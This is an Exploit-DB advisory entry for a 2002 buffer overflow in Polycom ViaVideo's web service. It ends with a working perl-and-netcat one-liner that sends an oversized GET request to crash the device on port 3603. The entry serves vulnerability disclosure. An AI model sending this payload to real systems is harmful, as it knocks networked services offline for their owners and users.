Polycom 2.2/3.0 ViaVideo Buffer Overflow Vulnerability

2002-10-15T00:00:00
ID EDB-ID:21941
Type exploitdb
Reporter prophecy.net.nz
Modified 2002-10-15T00:00:00

Description

Polycom 2.2/3.0 ViaVideo Buffer Overflow Vulnerability. CVE-2002-1905 . Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/5964/info

A buffer overflow vulnerability has been reported for ViaVideo.

An attacker can exploit this vulnerability by issuing excessively long 'GET' requests to ViaVideo devices. This will cause an error in the 'vvws.dll' library and will cause the ViaVideo service to crash.

Although unconfirmed, it may be possible for a remote attacker to exploit this issue to execute arbitrary system commands with the privileges of the ViaVideo process. 

perl -e 'print "GET " . "A" x 4132 . " HTTP/1.0\r\n\r\n";' | netcat 10.1.0.1 3603